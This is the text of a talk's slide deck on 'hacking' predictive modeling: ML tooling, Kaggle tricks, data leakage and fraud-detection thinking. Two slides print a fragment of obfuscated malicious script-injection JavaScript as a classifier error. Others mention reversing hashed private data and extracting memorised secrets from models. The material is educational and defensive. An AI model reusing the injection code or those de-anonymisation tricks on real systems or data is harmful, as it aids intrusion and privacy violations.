Hacking Predictive Modeling
HJ van Veen - Data Science & InfoSec @ Nubank
“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich

Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank

• Competitive data science fanatic

• Horrible Portuguese speaker (more so with public
speaking). Questions and clarifications in English please.

• @mlwave
Disclaimer
• These slides are for entertainment, educational and
research purposes only.

• ML is powerful and easy: “Since every scientific discovery
gives us more power over nature, it can increase good
or evil.” - César Lattes

• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users.



acm.org/code-of-ethics
Scope
• This presentation will be all over the place. I don’t know
whether you have never trained a model before or are
experienced with ML.

• But I hope this presentation will be interesting for the
hackers, makers, creators of all types.

• Catch me afterwards, if you want to talk about hyper
optimization.

What is AI?
What is AI?
Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
What is AI?
What is AI?
Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.)
Boy holds baseball bat Cat sits on couch
What is AI?
• AI grew out of Operations Research after WWII

• AI consists of many diverse subfields ranging from:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy,
Machine Learning.
• Fight hype. Just replace the word `AI` with `Software`: If the
result sounds silly or obvious, then the application of AI usually
is too. Power question: “What is your false positive rate?”.


What is Machine Learning?
• Automatically learn from data

• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classification). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling.

Why Software Is Eating the World (2016, Andreessen Horowitz)
What is Predictive Modeling?
• Puts the focus on creating predictions:

• Use of model,
• how to use the data,
• how to get good accuracy.

• Essential for creating a first solution, but only the bare minimum
of what goes into Machine Learning at commercial scale. ML
competitions are largely about predictive modeling.
Useful Paradigms
• Functionalism: Input -> Function -> Output

• Connectionism: Learn from data bottom-up by stacking
learning primitives, not top-down.

• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does.

• Coding Theory: Error detection and compression
Functionalism
• Philosophy of Mind: Mental states are defined by how they
function, not defined by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal.

• Perhaps we can model functional intelligence with
computers too?



Functionalism
Input     Transform             Model                 Output
Reality   Sensory Processing    Mental Modeling       Behavior
Data      Feature Engineering   Predictive Modeling   Predictions
Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure.

• Artificial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning

• Perhaps we can model intelligence with network
architectures too?



Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
Connectionism
Decision Demons
Cognitive Demons
Feature Demons
Image Demons
Pandemonium: A paradigm for learning. (Selfridge, 1959)
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
• Don’t care if there is a magical demon or a complex
maths formula in the box.
• The question then becomes: How to transform the data, and
how to parametrize the black box, so as to get the best
predictions?
• Remember: Garbage in - Garbage out (Don’t trust for
critical stuff like healthcare or self-driving cars or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about finding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about finding the most
relevant patterns.
Coding Theory
1 MegaByte 180 KiloByte
Data
• Data can be structured or unstructured.
• Tabular data is structured and can more readily be used

• Text and Sound and Images are unstructured

• Data can be temporal, for instance: time-series

• Rarely, data is in the shape of a graph (for instance, relations
between gang members)
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

Input   Transform             Model                 Output
Data    Feature Engineering   Predictive Modeling   Predictions
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well.

Feature Extraction - Foundations and Applications (Guyon et al., 2006)
Feature Engineering: Tricks
• Categorical Variables

• One-hot encoding for neural nets:

        Red   Green   Blue
Red     1     0       0
Green   0     1       0
Blue    0     0       1

• Label encoding for decision trees:

Red     1
Green   2
Blue    3
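A minimal sketch of both encodings in plain Python, using the three colors from the slide. The helper names `label_encode` and `one_hot_encode` are made up for illustration; in practice a library such as pandas or scikit-learn would usually do this for you.

```python
def label_encode(values, categories):
    """Map each category to an integer, starting at 1 as on the slide."""
    index = {cat: i + 1 for i, cat in enumerate(categories)}
    return [index[v] for v in values]


def one_hot_encode(values, categories):
    """Map each value to a row with a single 1 in the column of its category."""
    return [[1 if v == cat else 0 for cat in categories] for v in values]


categories = ["Red", "Green", "Blue"]
colors = ["Red", "Green", "Blue"]

labels = label_encode(colors, categories)
one_hot = one_hot_encode(colors, categories)

print(labels)
for row in one_hot:
    print(row)
```

Label encoding keeps a single column, which tree models can split on. One-hot encoding avoids suggesting an order between colors, which matters more for neural nets and linear models.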
Feature Engineering: Tricks
• That’s really (mostly) it!

• You can now apply the most advanced machine learning
algorithms to data and something you want to predict.

• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools).

Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.
Input   Transform             Model                 Output
Data    Feature Engineering   Predictive Modeling   Predictions
Modeling
Gender   Likes Open Source?   Wants RoadSec ticket?
1        1                    1
0        1                    1
1        1                    0
0        1                    1
1        0                    0
0        0                    0
1        0                    0
0        0                    0
Modeling
Gender   Likes Open Source?   Wants RoadSec ticket?
0        1                    ?
• Gender did not show any correlation, and 3/4 of the people
who like Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.
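The 0.75 can be reproduced by counting rows in the toy table. This is a sketch of the simplest possible "model" (a conditional frequency), not a recommendation. The function name `ticket_rate` and the 0.5 threshold for the hard prediction are assumptions made for illustration.

```python
# Toy training table from the slide: (gender, likes_open_source, wants_ticket)
rows = [
    (1, 1, 1), (0, 1, 1), (1, 1, 0), (0, 1, 1),
    (1, 0, 0), (0, 0, 0), (1, 0, 0), (0, 0, 0),
]


def ticket_rate(rows, likes_open_source):
    """Fraction of people with the given answer who wanted a ticket."""
    wants = [w for _, likes, w in rows if likes == likes_open_source]
    return sum(wants) / len(wants)


# New person: gender=0, likes_open_source=1
probability = ticket_rate(rows, likes_open_source=1)
hard_prediction = int(probability >= 0.5)  # assumed threshold

print(probability, hard_prediction)
```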
Modeling
• What model do you use for which data?

• Tabular data: Gradient boosted decision trees (XGBoost)

• Images: Pre-trained deep neural net (or Detectron)

• Text: TFIDF -> Logistic Regression (or FastText, ULMFiT,
BERT)
Search for above terms in combination with “machine learning”
Evaluation
Gender   Likes Open Source?   Wants RoadSec ticket?
1        1                    1
0        1                    1
1        1                    0
0        1                    1
1        0                    0
0        0                    0
1        0                    0
0        0                    0
Evaluation
Gender   Likes Open Source?   Wants RoadSec ticket?
1        1                    1
0        1                    1
1        1                    0
0        1                    1
1        0                    0
0        0                    0
1        0                    0
0        0                    0
Train
Predict
The Elements of Statistical Learning (2001, Friedman et al.)
Evaluation
Predictions   Wants RoadSec ticket?
1             1
1             1
1             0
1             1
0             0
0             0
0             0
0             0
Accuracy score: 7/8
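The accuracy score on this slide is simply the fraction of rows where the prediction matches the label. A small sketch with the two columns copied from the table (the function name `accuracy` is chosen here for illustration):

```python
predictions = [1, 1, 1, 1, 0, 0, 0, 0]
wants_ticket = [1, 1, 0, 1, 0, 0, 0, 0]


def accuracy(predicted, actual):
    """Fraction of predictions that equal the ground truth."""
    correct = sum(p == a for p, a in zip(predicted, actual))
    return correct / len(actual)


score = accuracy(predictions, wants_ticket)
print(score)
```

Only the third row is wrong, so 7 of the 8 predictions are correct.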
Optimization
• A Python classifier may look like:



FactorizationMachineBinaryClassifier(iters=5,
    learning_rate=0.1, latent_dim=20, radius=0.5,
    lambda_linear=0.0001, lambda_latent=0.0001,
    normalize='Auto', norm=True, caching='Auto',
    shuffle=True, verbose=True)
The trick is to tweak these parameters to get a better evaluation,
and to stop once any further change makes the evaluation worse.
Brute Forcing
• View hyperparameter optimization as a password
cracking task

• Enumerate or randomly try all possible parameters within a
range.

• Dictionary attack: Use “password dictionary files” with good
parameters that worked on other problems. Try these first.

• This is basically Random Search or Adaptive Search

Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
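The "dictionary attack, then brute force" idea can be sketched as follows. Everything here is a toy assumption: `evaluate` stands in for "train a model with these parameters and score it on held-out data", and the parameter names, ranges and dictionary entries are invented for illustration.

```python
import random


def evaluate(params):
    """Stand-in for training and scoring a model (higher is better).

    Hypothetical toy objective that peaks at learning_rate=0.1, depth=6.
    """
    return -abs(params["learning_rate"] - 0.1) - 0.01 * abs(params["depth"] - 6)


def random_params(rng):
    """Draw one random candidate within hand-picked ranges."""
    return {
        "learning_rate": 10 ** rng.uniform(-3, 0),  # log-uniform in [0.001, 1]
        "depth": rng.randint(2, 12),
    }


def search(dictionary, n_random, seed=0):
    """Try known-good settings first, then random guesses; keep the best."""
    rng = random.Random(seed)
    candidates = list(dictionary) + [random_params(rng) for _ in range(n_random)]
    return max(candidates, key=evaluate)


# "Password dictionary": settings that worked on other problems (made up here)
dictionary = [
    {"learning_rate": 0.3, "depth": 6},
    {"learning_rate": 0.05, "depth": 8},
]

best = search(dictionary, n_random=50)
print(best, evaluate(best))
```

Because the dictionary entries are always among the candidates, the result can never be worse than the best known-good setting.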
Brute Forcing
• How to find the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights?

• How about trying every possible combination of weights
and picking the one with the best evaluation? Worst case:
you spend 2 more hours of compute.

KazAnova@kaggle
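A sketch of brute-forcing ensemble weights, assuming three models, a small integer weight grid and mean squared error as the evaluation. The labels and predictions below are made-up numbers, and the weights should be chosen on held-out predictions, not on training data.

```python
from itertools import product

# Hypothetical held-out labels and predicted probabilities from three models
y_true = [1, 0, 1, 1, 0, 0, 1, 0]
model_preds = [
    [0.9, 0.4, 0.6, 0.7, 0.3, 0.6, 0.8, 0.2],
    [0.6, 0.1, 0.4, 0.9, 0.5, 0.2, 0.7, 0.4],
    [0.7, 0.6, 0.8, 0.4, 0.1, 0.3, 0.5, 0.3],
]


def mean_squared_error(weights):
    """Error of the weighted average of the model predictions."""
    total = sum(weights)
    error = 0.0
    for i, target in enumerate(y_true):
        blended = sum(w * preds[i] for w, preds in zip(weights, model_preds)) / total
        error += (blended - target) ** 2
    return error / len(y_true)


# Every combination of integer weights 0..10, skipping the all-zero blend
grid = [w for w in product(range(11), repeat=len(model_preds)) if sum(w) > 0]
best_weights = min(grid, key=mean_squared_error)

print(best_weights, mean_squared_error(best_weights))
```

No gradients, optimizer or regularization choices are needed. The cost is that the grid grows exponentially with the number of models.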
Brute Forcing
• Do we really need to manually train all these models?

• What would happen if we automatically trained 1000
random models with random data transformations and
threw them all into another black box?

• Out comes a winning Kaggle submission…


Kaggle Ensembling Guide (van Veen et al., 2015)
Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on test set.

• For every column in test set:
• randomly shuffle the column
• Evaluate the new predictions
• If the evaluation is no worse with the column randomly
shuffled, then you can likely discard the column.

 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.
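A minimal sketch of the shuffling loop, reusing the toy RoadSec table as a held-out set. The "trained model" is a stand-in that only looks at the second column, and the names `model_predict` and `permutation_importance` are chosen for this example. Columns whose shuffling does not hurt the score are candidates for removal.

```python
import random

# Held-out rows (gender, likes_open_source) and their labels
X_test = [[1, 1], [0, 1], [1, 1], [0, 1], [1, 0], [0, 0], [1, 0], [0, 0]]
y_test = [1, 1, 0, 1, 0, 0, 0, 0]


def model_predict(row):
    """Stand-in for a trained model: it only uses 'likes open source'."""
    return row[1]


def accuracy(X, y):
    return sum(model_predict(row) == label for row, label in zip(X, y)) / len(y)


def permutation_importance(X, y, column, n_repeats=20, seed=0):
    """Average drop in accuracy after randomly shuffling one column."""
    rng = random.Random(seed)
    baseline = accuracy(X, y)
    drops = []
    for _ in range(n_repeats):
        values = [row[column] for row in X]
        rng.shuffle(values)
        shuffled = [row[:column] + [v] + row[column + 1:] for row, v in zip(X, values)]
        drops.append(baseline - accuracy(shuffled, y))
    return sum(drops) / n_repeats


importances = {
    name: permutation_importance(X_test, y_test, col)
    for col, name in enumerate(["gender", "likes_open_source"])
}
print(importances)
```

Shuffling `gender` changes nothing because the stand-in model ignores it, so its importance is zero. Shuffling `likes_open_source` lowers the accuracy on average.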
Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• ML Community is incentivized
to share easily replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?

Warez
• Good tools: 

• allow you to experiment and iterate quickly

• have an active community contributing new features

• can be applied to many different problems with similar
results.

• abstract away complexity.

Python
• Grown to be essential to data science and machine
learning. 

• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code

PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
Python
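from sklearn import datasets, ensemble

# Load the iris flowers: X holds the features, y the species labels
iris = datasets.load_iris()
X = iris.data
y = iris.target

# Every scikit-learn model is trained with fit() and queried with predict()
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
p = model.predict(X)  # predictions on the training data itself, for brevity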

Scikit-Learn
• The Metasploit of Machine Learning

• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models)

• You could get by for a while learning only this library very well

Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
XGBoost
• The best for tabular data: 

• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API

• Alternatives: GradientBoostingClassifier, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
Keras
• User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning.

• Alternatives: PyTorch with Fast.AI library



Deep Learning with Python (Chollet, 2017)
Vowpal Wabbit
• Very fast online learning on data bigger than memory

• Can be faster and more accurate than Hadoop/Spark
• Uses cool hashing trick inspired by Bloom filter
• Support for contextual bandits (automated decision
making)
• Eats raw features:
• 1 '10000074 |f category_x_transport emails_cnt:0.0
emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii
exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
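The hashing trick can be sketched in a few lines: feature names are hashed straight to positions in a fixed-size weight vector, so no feature dictionary has to be built or kept in memory. This is an illustration, not Vowpal Wabbit's implementation: `zlib.crc32` stands in for its hash function, and the 18-bit table size and the function name `hash_features` are assumptions.

```python
import zlib


def hash_features(tokens, n_bits=18):
    """Map raw 'name' or 'name:value' features to indices in a 2**n_bits table."""
    size = 2 ** n_bits
    indexed = {}
    for token in tokens:
        name, _, value = token.partition(":")
        index = zlib.crc32(name.encode("utf-8")) % size
        # Features that collide share one slot; their values are summed
        indexed[index] = indexed.get(index, 0.0) + (float(value) if value else 1.0)
    return indexed


features = hash_features(
    ["category_x_transport", "emails_cnt:0.0", "exclamationmark", "2005"]
)
print(features)
```

Collisions cost a little accuracy but keep memory use fixed, which is what makes learning on data bigger than memory practical.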
Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas

• Fast, scalable and supports many types of data

• Perform vector operations on NumPy (or Numba) arrays

• Wide support for scientific calculations


Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form.

• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF

• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->
State:New_York
Tricks as seen on the Kaggle forums
Reverse Engineering
• Use model predictions to reverse engineer the training
data.

• Simple brute force can use fitted language models to
retrieve secrets from the training data:
• Credit card numbers
• Social Security numbers / CPFs
• This can work even if the model has seen the secret only
once (DL is good at memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
Social Engineering
• You cannot survive in most businesses
with just predictive modeling.

• Companies don’t hire an AutoML
solution, they hire people.

• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.
Social Engineering
• How to gain access to the online data science community?

• Compete together.
• Write a cool blog about it.
• Write/contribute to Open Source projects.
• Write tutorials/step-by-step guides.

• Basically share everything: A 100-line Python script (toy
wrapper for Regularized Greedy Forest) could grow to a
professional project that you now can use yourself.
https://github.com/RGF-team/rgf
Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor

• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show, don’t tell: Save your most powerful models until the
very last
Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard?

• Wacky Boosting:
• Keep changing your submission
• Use leaderboard feedback to see whether it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1

• Will horribly overfit, but can also cause others to overfit!
Competing in a data science contest without reading the data (2015, Hardt)
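A toy simulation of the loop on this slide, assuming a binary task where the public leaderboard reports exact accuracy on a fixed half of the test rows. It is a simplified greedy variant written for illustration, not the procedure from the cited post, and all sizes and names are made up.

```python
import random

rng = random.Random(0)
n_rows, n_public = 200, 100
truth = [rng.randint(0, 1) for _ in range(n_rows)]  # hidden from competitors
public_rows = range(n_public)                       # scored on the public leaderboard
private_rows = range(n_public, n_rows)              # decide the final ranking


def score(submission, rows):
    """Leaderboard feedback: accuracy on the given rows."""
    return sum(submission[i] == truth[i] for i in rows) / len(rows)


submission = [rng.randint(0, 1) for _ in range(n_rows)]  # never looks at the data
best_public = score(submission, public_rows)

for i in range(n_rows):
    submission[i] ^= 1                   # change the submission
    new_public = score(submission, public_rows)
    if new_public > best_public:         # keep good changes
        best_public = new_public
    else:                                # undo bad or neutral changes
        submission[i] ^= 1

print("public:", best_public, "private:", score(submission, private_rows))
```

The public score climbs to a perfect 1.0 while the private rows are never improved, because changes to them give no feedback. That gap is the overfitting the slide warns about.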
Information Snooping
• Normally it is not advisable to use the test set. But for
competitions the test set is available, so:

• Can use semi-supervised learning to extract information
from the test set. Use test set for:

• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding confident predictions as labels to train set
github.com/gatapia Guido Tapia
Rainbow tables
• Sometimes categorical variables are hashed to obscure
them.

• Can use rainbow tables to reverse a (truncated) MD5 hash
and get the original feature.

• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!
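When the set of plausible original values is small, a plain precomputed lookup table is enough. The sketch below uses that simpler technique instead of a true rainbow table (which trades memory for time with hash chains). It assumes the hidden values are ordinals below 1000 and that the hash was cut to 8 hex characters; both are illustrative assumptions.

```python
import hashlib


def truncated_md5(value, length=8):
    """MD5 hex digest of a string, cut to the first `length` characters."""
    return hashlib.md5(value.encode("utf-8")).hexdigest()[:length]


# Precompute the hash of every plausible original value (here: ordinals 0..999)
lookup = {truncated_md5(str(n)): str(n) for n in range(1000)}

# A hashed column as it might appear in a released dataset
obfuscated_column = [truncated_md5("42"), truncated_md5("7"), truncated_md5("42")]
recovered = [lookup.get(h) for h in obfuscated_column]

print(recovered)
```

The same property is why hashing low-cardinality private data such as IP addresses does not anonymize it: anyone can enumerate the inputs.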
Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold!

• Local evaluation is your lifeline.

• Try everything, keep the good.

• Once I got an accuracy of 181% by
submitting correct answers twice.
[Figure with the labels “Statisticians”, “Machine Learners”, “Smart Machine Learner” and “CV”]
(The joke is that there are only smart statisticians)
Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
DataLeaks
• A very common mistake. Can be deadly for business and
science, so become good at finding leaks.
• The task was to predict cancer. One of the variables was
“underwent surgery for cancer, yes/no?”
• You cannot use data that is not reasonably available at
test time (or your lifeline evaluation cannot be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
DataLeaks
• Beware: The more powerful your model, the bigger the chance
that it exploits any remaining leakage that you did not find.
• The most powerful model is 1000 data scientists on a
typewriter, which is why competitions see more leakage
discovered.

• A large sample of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle
DataLeaks
• Winners of Microsoft malware binary classification 2015
were able to extract the desktop icon from the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
Sub-Linear Debugging
• Output information while your computations are running.
This is essential for iteration speed:
• You can spot very quickly whether a change was good or bad.
• Feels like Neo in the Matrix if you do this with the data
itself during data reading.
• You can spot data health issues (text encoding errors, all
values missing in the same row of data, etc.)
Online Learning and Sub-Linear Debugging (Mineiro, 2014)
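One way to get this kind of feedback is to report the running error at exponentially spaced row counts, so the first signals arrive after a handful of rows and not at the end of the run. A sketch with a made-up stream of (prediction, label) pairs; the function name `running_error` is chosen for this example.

```python
def running_error(pairs):
    """Stream over (prediction, label) pairs, reporting at rows 1, 2, 4, 8, ..."""
    mistakes = 0
    report_at = 1
    reports = []
    for seen, (prediction, label) in enumerate(pairs, start=1):
        mistakes += prediction != label
        if seen == report_at:
            reports.append((seen, mistakes / seen))
            print(f"rows={seen:>6}  progressive error={mistakes / seen:.3f}")
            report_at *= 2
    return reports


# Toy stream: a model that always predicts 1, on labels that are 0 every 4th row
stream = ((1, 1 if i % 4 else 0) for i in range(1000))
reports = running_error(stream)
```

The number of printed lines grows only logarithmically with the data size, so the output stays readable on very large files.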
Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix it by creating new features
• The sample below was confidently predicted as minified JS when it
was actually obfuscated malicious JS:











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js
Error Debugging
• How to fix?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
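Two of the proposed features are simple character ratios. A sketch, assuming the JavaScript source is available as a string; the function name `obfuscation_features` and the `minified` example are made up, while the `obfuscated` string is one fragment of the sample above. The human-readability score is left out because the slide does not say how it was computed.

```python
def obfuscation_features(source):
    """Character ratios over a JavaScript source string."""
    n_chars = max(len(source), 1)  # avoid division by zero on empty input
    return {
        "digit_ratio": sum(ch.isdigit() for ch in source) / n_chars,
        "x_ratio": source.count("x") / n_chars,
    }


minified = "function add(a,b){return a+b}"
obfuscated = "x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"

print(obfuscation_features(minified))
print(obfuscation_features(obfuscated))
```

Ordinary minified code contains few digits and few "x" characters, while hex-escaped strings are dominated by them, so both ratios separate the two examples clearly.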
Dumpster Diving
• You should find out the sources and shapes of all your
data, then do a deep dive:

• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonymize users and obtain the ground truth.

• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth.



Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayanan et al.)
Adversarial Input
• These people are invisible to % of modern face detection
CV Dazzle (Harvey et al., 2010)
Adversarial Input
• This image is confusing to modern object detection
“A foreign attack
helicopter firing missiles”
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable.

• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge
Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible, or
are you more patient?
• Do you memorize your victim’s personal details?



Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check how long the user spends in the funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)
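A few of these safeguards can be turned into features with the standard library alone. This is a rough sketch: the field names, the example applicant and the use of `difflib.SequenceMatcher` as the string distance are all assumptions, and the operating system check is deliberately crude (Android user agents, for example, also contain "Linux").

```python
from datetime import datetime
from difflib import SequenceMatcher


def name_email_similarity(legal_name, email):
    """Similarity in [0, 1] between the legal name and the email's local part."""
    local_part = email.split("@")[0].lower()
    letters_only = "".join(ch for ch in legal_name.lower() if ch.isalpha())
    return SequenceMatcher(None, letters_only, local_part).ratio()


def fraud_features(legal_name, email, user_agent, attempted_at):
    """Encode one application attempt as model-ready features."""
    return {
        "hour_of_day": attempted_at.hour,
        "name_email_similarity": name_email_similarity(legal_name, email),
        "is_windows": "Windows" in user_agent,
        "is_linux": "Linux" in user_agent,
    }


features = fraud_features(
    legal_name="Maria Silva",  # hypothetical applicant
    email="mariasilva@example.com",
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    attempted_at=datetime(2018, 11, 10, 3, 15),
)
print(features)
```

IP reputation and Tor exit checks need external data sources, so they are not shown here.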
Botnet
• Much of commercial ML can be, or already is being, automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Think back to the ID fraudster example: Can you
imagine how to cheat an ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
Case Study: Higgs Boson
• “Science cannot predict what will happen. It can only
predict the probability of something happening.” - César Lattes

• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise)

• No knowledge of particle physics is required.

• XGBoost was a 0-day during competition (This could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)
Case Study: Higgs Boson
• Let’s hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick the model with the best log loss, lower its learning rate,
and use early stopping to find the best number of trees.
• Repeat the above 3 times and average the results
Position: 30/1785
Further Learning
• MOOCs: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science on Coursera, Abu-Mostafa’s Caltech
Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find a cool professor and study their online output
nubank.workable.com
Nubank is
hiring!

Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
 
Demystifying Machine Learning
Demystifying Machine LearningDemystifying Machine Learning
Demystifying Machine Learning
 
Engineering Intelligent Systems using Machine Learning
Engineering Intelligent Systems using Machine Learning Engineering Intelligent Systems using Machine Learning
Engineering Intelligent Systems using Machine Learning
 
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
 
Machine learning a developer's perspective
Machine learning   a developer's perspectiveMachine learning   a developer's perspective
Machine learning a developer's perspective
 
Core Methods In Educational Data Mining
Core Methods In Educational Data MiningCore Methods In Educational Data Mining
Core Methods In Educational Data Mining
 

Recently uploaded

Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
